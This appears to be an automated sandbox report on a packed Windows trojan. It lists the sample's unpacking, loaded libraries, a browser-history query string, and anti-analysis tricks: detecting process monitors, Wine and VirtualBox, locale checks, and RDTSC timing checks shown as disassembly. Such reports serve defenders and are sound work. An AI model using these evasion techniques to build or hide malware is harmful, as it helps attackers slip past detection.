              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013D7BA40_2_013D7BA4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01322A600_2_01322A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01318A800_2_01318A80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0131C52C0_2_0131C52C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013245630_2_01324563
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0131DC750_2_0131DC75
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130AC4B0_2_0130AC4B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0131A49E0_2_0131A49E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01320FA50_2_01320FA5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0120A7930_2_0120A793
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01311FF70_2_01311FF7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01325FEE0_2_01325FEE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013287CA0_2_013287CA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013296870_2_01329687
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0131F6F90_2_0131F6F9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0127A6DB0_2_0127A6DB
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00F64A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: imljxmgr ZLIB complexity 0.9949059359060906
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F83A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00F83A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00F7CAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\TQ9RDVLV.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT url FROM moz_places LIMIT 1000f;4G
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1812480 > 1048576
              Source: file.exeStatic PE information: Raw size of imljxmgr is bigger than: 0x100000 < 0x1a0a00

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;imljxmgr:EW;joqxgqti:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;imljxmgr:EW;joqxgqti:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F86390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F86390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1ca1ee should be: 0x1c4341
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: imljxmgr
              Source: file.exeStatic PE information: section name: joqxgqti
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01391937 push 082722E2h; mov dword ptr [esp], esi0_2_013919AC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013BE12B push edx; mov dword ptr [esp], esp0_2_013BE146
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013AA90D push edx; mov dword ptr [esp], ebx0_2_013AA911
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01357970 push eax; mov dword ptr [esp], edi0_2_0135797A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01357970 push eax; mov dword ptr [esp], ebp0_2_01357986
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F87895 push ecx; ret 0_2_00F878A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013D8145 push 7288355Fh; mov dword ptr [esp], ebp0_2_013D8202
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013CF143 push edi; mov dword ptr [esp], 5EFB24E2h0_2_013CF182
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013E01B9 push esi; mov dword ptr [esp], 7FCC57AFh0_2_013E01CD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_014009CC push edi; mov dword ptr [esp], ecx0_2_014009D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_014009CC push edi; mov dword ptr [esp], 6FFFFBEAh0_2_01400B39
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013EB1AA push 1029D1A9h; mov dword ptr [esp], edi0_2_013EB216
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138899F push 764D459Bh; mov dword ptr [esp], eax0_2_013889C3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138899F push eax; mov dword ptr [esp], edx0_2_013889DB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012F8184 push 3F9020E9h; mov dword ptr [esp], ebx0_2_012F8199
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013B5989 push edi; mov dword ptr [esp], ebp0_2_013B59A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EC9CD push ebp; mov dword ptr [esp], 00000004h0_2_011EC9E4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EC9CD push esi; mov dword ptr [esp], ebx0_2_011ECA4F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013A91D5 push 05CE06AAh; mov dword ptr [esp], ecx0_2_013A91DD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A702B push edx; mov dword ptr [esp], ebp0_2_012A7042
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A702B push edx; mov dword ptr [esp], edi0_2_012A7094
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A702B push 12083B20h; mov dword ptr [esp], ecx0_2_012A70A4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A702B push edi; mov dword ptr [esp], 3FF7CD2Dh0_2_012A70AE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013F681E push ebp; mov dword ptr [esp], eax0_2_013F6869
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0140D803 push ecx; mov dword ptr [esp], 32F24093h0_2_0140D838
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0140D803 push ecx; mov dword ptr [esp], edi0_2_0140D85E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01399059 push 21721EB4h; mov dword ptr [esp], ebx0_2_013990BA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0140E828 push ebx; mov dword ptr [esp], esi0_2_0140E870
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0140A034 push ebp; mov dword ptr [esp], 24B7432Bh0_2_0140A063
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0140A034 push edx; mov dword ptr [esp], 2BEFEAB0h0_2_0140A0D9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013EE846 push edi; mov dword ptr [esp], 67FF3C4Fh0_2_013EE880
              Source: file.exeStatic PE information: section name: imljxmgr entropy: 7.953583121368327

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F86390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F86390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-25894
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF8DA second address: 11AF8DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132F36B second address: 132F37E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BDFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E492 second address: 132E4A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FEA188F2DBDh 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E4A6 second address: 132E4AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E4AC second address: 132E4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E4B0 second address: 132E4BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BDAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E5DA second address: 132E5EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188F2DBCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13319D8 second address: 11AF8DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FEA188A9BE9h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 60F6C3E9h 0x00000012 push dword ptr [ebp+122D1675h] 0x00000018 mov di, 1DFDh 0x0000001c call dword ptr [ebp+122D2C19h] 0x00000022 pushad 0x00000023 pushad 0x00000024 pushad 0x00000025 jne 00007FEA188A9BD6h 0x0000002b mov cx, di 0x0000002e popad 0x0000002f mov dword ptr [ebp+122D2019h], ecx 0x00000035 popad 0x00000036 xor eax, eax 0x00000038 stc 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d or dword ptr [ebp+122D2019h], edi 0x00000043 mov dword ptr [ebp+122D2ACCh], eax 0x00000049 pushad 0x0000004a push ebx 0x0000004b adc si, D048h 0x00000050 pop edi 0x00000051 mov dword ptr [ebp+122D1E04h], eax 0x00000057 popad 0x00000058 sub dword ptr [ebp+122D1BB8h], edi 0x0000005e mov esi, 0000003Ch 0x00000063 or dword ptr [ebp+122D37A4h], ebx 0x00000069 add esi, dword ptr [esp+24h] 0x0000006d add dword ptr [ebp+122D1BD1h], ecx 0x00000073 lodsw 0x00000075 js 00007FEA188A9BE3h 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f clc 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 pushad 0x00000085 mov ebx, dword ptr [ebp+122D289Ch] 0x0000008b mov esi, dword ptr [ebp+122D2A4Ch] 0x00000091 popad 0x00000092 nop 0x00000093 push eax 0x00000094 push edx 0x00000095 jmp 00007FEA188A9BDFh 0x0000009a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331A81 second address: 1331A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331B2B second address: 1331B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188A9BDBh 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331C84 second address: 1331CC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FEA188F2DB6h 0x00000009 jnl 00007FEA188F2DB6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 jmp 00007FEA188F2DBEh 0x00000019 push eax 0x0000001a jmp 00007FEA188F2DC0h 0x0000001f pop eax 0x00000020 popad 0x00000021 mov eax, dword ptr [esp+04h] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jne 00007FEA188F2DB6h 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331CC7 second address: 1331CD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331CD5 second address: 1331CE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA188F2DBBh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331CE4 second address: 1331CFC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEA188A9BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FEA188A9BD6h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331CFC second address: 1331D02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331D02 second address: 1331D2C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEA188A9BECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331D2C second address: 1331D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEA188F2DBCh 0x0000000a popad 0x0000000b pop eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FEA188F2DB8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov esi, dword ptr [ebp+122D29E8h] 0x0000002c push 00000003h 0x0000002e mov ecx, dword ptr [ebp+122D281Ch] 0x00000034 push 00000000h 0x00000036 mov dword ptr [ebp+122D1C21h], ebx 0x0000003c push 00000003h 0x0000003e cld 0x0000003f push 9BD5128Eh 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FEA188F2DC6h 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331D92 second address: 1331DC2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEA188A9BD8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 5BD5128Eh 0x00000013 xor dword ptr [ebp+122D3801h], ebx 0x00000019 lea ebx, dword ptr [ebp+124558D3h] 0x0000001f mov edx, dword ptr [ebp+122D2A9Ch] 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jns 00007FEA188A9BD8h 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331E21 second address: 1331E8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FEA188F2DBDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jno 00007FEA188F2DC7h 0x00000014 nop 0x00000015 mov esi, dword ptr [ebp+122D2944h] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FEA188F2DB8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 sub di, 2CC4h 0x0000003c add dword ptr [ebp+122D221Eh], eax 0x00000042 push CFC862F6h 0x00000047 push esi 0x00000048 push eax 0x00000049 push edx 0x0000004a push ebx 0x0000004b pop ebx 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331E8E second address: 1331E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331E92 second address: 1331F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 add dword ptr [esp], 30379D8Ah 0x0000000e mov si, 32A3h 0x00000012 push 00000003h 0x00000014 mov cx, 5B0Bh 0x00000018 push 00000000h 0x0000001a mov esi, edx 0x0000001c push 00000003h 0x0000001e mov esi, 5C4D1A24h 0x00000023 push 69799860h 0x00000028 push esi 0x00000029 jmp 00007FEA188F2DC0h 0x0000002e pop esi 0x0000002f add dword ptr [esp], 568667A0h 0x00000036 push ebx 0x00000037 push eax 0x00000038 mov dword ptr [ebp+122D27F7h], ecx 0x0000003e pop ecx 0x0000003f pop ecx 0x00000040 jnl 00007FEA188F2DBCh 0x00000046 lea ebx, dword ptr [ebp+124558DEh] 0x0000004c or di, 39CFh 0x00000051 xchg eax, ebx 0x00000052 pushad 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 pushad 0x00000057 popad 0x00000058 popad 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331F00 second address: 1331F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1352517 second address: 135252F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA188F2DB6h 0x00000008 js 00007FEA188F2DB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jng 00007FEA188F2DB8h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13506C6 second address: 13506D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FEA188A9BD6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13506D3 second address: 13506F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188F2DC0h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e jbe 00007FEA188F2DB6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350AB8 second address: 1350AC8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEA188A9BD6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350AC8 second address: 1350ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350C1E second address: 1350C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350C24 second address: 1350C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350C28 second address: 1350C40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FEA188A9BD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEA188A9BDAh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350C40 second address: 1350C4A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEA188F2DB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350F2D second address: 1350F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop esi 0x0000000a pushad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push edx 0x00000010 jno 00007FEA188A9BD6h 0x00000016 pop edx 0x00000017 pushad 0x00000018 jno 00007FEA188A9BD6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1351212 second address: 1351216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1351216 second address: 135121C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13514DE second address: 13514E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344BD6 second address: 1344BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344BDA second address: 1344BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344BE0 second address: 1344BFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA188A9BE8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1351F01 second address: 1351F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135203A second address: 135207C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jno 00007FEA188A9BD6h 0x00000012 jmp 00007FEA188A9BE7h 0x00000017 jne 00007FEA188A9BD6h 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1325B06 second address: 1325B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FEA188F2DB6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1325B10 second address: 1325B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1325B14 second address: 1325B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1356FF8 second address: 1356FFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135BFD6 second address: 135BFDC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135C136 second address: 135C140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FEA188A9BD6h 0x0000000a rdtsc
